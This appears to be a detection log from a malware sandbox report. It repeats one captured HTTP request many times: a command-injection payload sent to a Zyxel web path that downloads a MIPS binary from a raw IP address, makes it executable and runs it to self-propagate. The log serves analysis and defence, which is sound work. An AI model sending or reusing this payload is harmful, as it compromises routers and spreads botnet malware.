          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
